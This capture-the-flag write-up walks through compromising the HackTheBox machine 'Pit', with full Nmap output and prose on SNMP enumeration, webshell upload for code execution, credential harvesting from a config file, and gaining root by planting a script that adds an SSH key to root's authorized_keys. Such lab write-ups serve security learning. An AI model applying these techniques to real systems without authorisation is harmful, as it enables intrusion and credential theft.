Pit - HackTheBox
Start with an Nmap scan for open ports.
┌──(root💀kali)-[/home/kali/HTB/Pit/machine]
└─# nmap -sS --min-rate=5000 -vvv -n -Pn --open 10.10.10.241 -oN targeted
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-26 05:01 EDT
Initiating SYN Stealth Scan at 05:01
Scanning 10.10.10.241 [1000 ports]
Discovered open port 80/tcp on 10.10.10.241
Discovered open port 22/tcp on 10.10.10.241
Discovered open port 9090/tcp on 10.10.10.241
Completed SYN Stealth Scan at 05:01, 0.73s elapsed (1000 total ports)
Nmap scan report for 10.10.10.241
Host is up, received user-set (0.071s latency).
Scanned at 2021-09-26 05:01:42 EDT for 1s
Not shown: 997 filtered ports
Reason: 991 no-responses and 6 admin-prohibiteds
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
9090/tcp open zeus-admin syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.82 seconds
Raw packets sent: 1991 (87.604KB) | Rcvd: 9 (564B)
Perform another scan to detect the version of each open service found.
┌──(root💀kali)-[/home/kali/HTB/Pit/machine]
└─# nmap -sC -sV -p22,80,9090 10.10.10.241 -oN webScan
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-26 05:02 EDT
Nmap scan report for 10.10.10.241
Host is up (0.053s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
| 256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_ 256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
80/tcp open http nginx 1.14.1
|_http-server-header: nginx/1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
9090/tcp open ssl/zeus-admin?
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 400 Bad request
| Content-Type: text/html; charset=utf8
| TransferEncoding: chunked
| X-DNS-Prefetch-Control: off
| Referrer-Policy: no-referrer
| X-Content-Type-Options: nosniff
| Cross-Origin-Resource-Policy: same-origin
| <!DOCTYPE html>
| <html>
| <head>
| <title>
| request
| </title>
| <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <style>
| body {
| margin: 0;
| font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
| font-size: 12px;
| line-height: 1.66666667;
| color: #333333;
| background-color: #f5f5f5;
| border: 0;
| vertical-align: middle;
| font-weight: 300;
|_ margin: 0 0 10p
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after: 2030-06-04T16:09:12
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9090-TCP:V=7.91%T=SSL%I=7%D=9/26%Time=61503762%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,E70,"HTTP/1\.1\x20400\x20Bad\x20request\r\nContent-Type:
SF:\x20text/html;\x20charset=utf8\r\nTransfer-Encoding:\x20chunked\r\nX-DN
SF:S-Prefetch-Control:\x20off\r\nReferrer-Policy:\x20no-referrer\r\nX-Cont
SF:ent-Type-Options:\x20nosniff\r\nCross-Origin-Resource-Policy:\x20same-o
SF:rigin\r\n\r\n29\r\n<!DOCTYPE\x20html>\n<html>\n<head>\n\x20\x20\x20\x20
SF:<title>\r\nb\r\nBad\x20request\r\nd08\r\n</title>\n\x20\x20\x20\x20<met
SF:a\x20http-equiv=\"Content-Type\"\x20content=\"text/html;\x20charset=utf
SF:-8\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\"\x20content=\"width=de
SF:vice-width,\x20initial-scale=1\.0\">\n\x20\x20\x20\x20<style>\n\tbody\x
SF:20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x200;\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-family:\x20\"RedHatDi
SF:splay\",\x20\"Open\x20Sans\",\x20Helvetica,\x20Arial,\x20sans-serif;\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-size:\x2012px;\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20line-height:\x201\.6666666
SF:7;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20color:\x20#333333;\
SF:n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20#
SF:f5f5f5;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20img\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20border:\
SF:x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20vertical-align:\
SF:x20middle;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-w
SF:eight:\x20300;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20p\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20mar
SF:gin:\x200\x200\x2010p")%r(HTTPOptions,E70,"HTTP/1\.1\x20400\x20Bad\x20r
SF:equest\r\nContent-Type:\x20text/html;\x20charset=utf8\r\nTransfer-Encod
SF:ing:\x20chunked\r\nX-DNS-Prefetch-Control:\x20off\r\nReferrer-Policy:\x
SF:20no-referrer\r\nX-Content-Type-Options:\x20nosniff\r\nCross-Origin-Res
SF:ource-Policy:\x20same-origin\r\n\r\n29\r\n<!DOCTYPE\x20html>\n<html>\n<
SF:head>\n\x20\x20\x20\x20<title>\r\nb\r\nBad\x20request\r\nd08\r\n</title
SF:>\n\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20content=\"te
SF:xt/html;\x20charset=utf-8\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\
SF:"\x20content=\"width=device-width,\x20initial-scale=1\.0\">\n\x20\x20\x
SF:20\x20<style>\n\tbody\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20margin:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20fon
SF:t-family:\x20\"RedHatDisplay\",\x20\"Open\x20Sans\",\x20Helvetica,\x20A
SF:rial,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20f
SF:ont-size:\x2012px;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20lin
SF:e-height:\x201\.66666667;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20color:\x20#333333;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0background-color:\x20#f5f5f5;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20img\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20border:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20vertical-align:\x20middle;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20font-weight:\x20300;\n\x20\x20\x20\x20\x20\x20\x20\x20
SF:}\n\x20\x20\x20\x20\x20\x20\x20\x20p\x20{\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20margin:\x200\x200\x2010p");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 192.25 seconds
Nmap found me three open ports, one for SSH and the other two for web servers, I started by looking at the web server running on port 80.
Apparently there was nothing interesting, I decided to fuzz to find directories, but I found nothing.
When accessing port 9090 I was redirected to a different domain, I saw that virtual hosting was being applied, that is, storing different domains in the same IP, for this I included the domains dms-pit.htb and pit.htb that Nmap reported to me in /etc/hosts.
I tried to access port 9090 again and found a 403 FORBIDDEN.
Seeing that I didn’t find anything interesting in TCP I decided to try UDP and see if it had any open ports. To do this I used the udp-proto-scanner.pl tool and found snmp open on port 161.
So I tried enumerating snmp with onesixtyone to see if I could find any “community strings” that I could use to find information, and I decided to clone a dictionary of them.
When performing the recognition I found the public tag.
Thanks to this “community string” I was able to list information with snmpwalk, but I found nothing.
Thinking for a while I realized that I could list more information with MIB's, for this I used the MIB NET-SNMP-EXTEND-MIB::nsExtendOutputFull.
I found a route that caught my attention.
Testing the route on the web servers, the only one that responded was the one running on port 9090.
It was a login panel, I looked to see if there was an exploit available.
I found an exploit that granted remote execution of arbitrary code, but I needed to be authenticated in the panel, by doing “password spraying” I managed to access with the user and password michelle that had been reported to me in the snmp enumeration.
Inside the panel I found a folder called Docs.
In it I found another one called Users.
Accessing it I found two other folders, one called michelle and another Jack, I accessed the michelle folder, since it is the user with which I am authenticated, excuse the redundancy, in it I found a section that apparently allowed me to add documents.
This was the form that was presented to me.
I put the name of the webshell and selected it.
And I uploaded it.
I needed your ID, that’s what it was in the url for.
And I gained arbitrary code execution.
I wanted to create a reverse shell but it seems that there was some kind of restriction and it wouldn’t let me, so I had to use a tool, ttyoverhttp, this tool from s4vitar allows the execution of arbitrary code in a shell without having to use a “FakeShell” or establish a socket, this tool makes use of the mkfifo utility, just copy the path of the webshell and paste it in the corresponding section.
I ran it with Python3 and got RCE.
Enumerating the system a bit I found a settings.xml in /var/www/html/seeddms51x/conf, this had credentials.
These were used to authenticate myself in the CentOS Linux login panel using the user michelle.
This was the panel.
What caught my attention the most was the Terminal section, accessing it I found a kind of remote Shell, I was able to see the user flag and establish a reverse shell to my machine.
And I received the shell.
ESCALADA DE PRIVILEGIOS
For privilege escalation I found this binary /usr/bin/monitor.
#!/bin/bash
for script in /usr/local/monitoring/check*sh
do
/bin/bash $script
done
Seeing this reminded me of something from snmp, when I executed the enumeration with the MIB NET-SNMP-EXTEND-MIB::nsExtendOutputFull, there was a “delay” of waiting time until the enumeration was executed, this was produced by a binary called the same, /usr/bin/monitor.
So I thought that somehow there could be a connection, this script would run any script called check followed by something and .sh stored in the path /usr/local/monitoring, what I did was create a pair of keys with ssh-keygen and create a script that copies them to /root/.ssh/autorized_keys, this way if the user is privileged he could log in to ssh without providing credentials, I first created the keys.
Now I created the script and transferred it to the /usr/local/monitoring path, running the enumeration again with snmp with the MIB NET-SNMP-EXTEND-MIB::nsExtendOutputFull, the script was executed and I was able to access the machine via ssh with the public key, I was now able to view the root user “flag”.
Leave a comment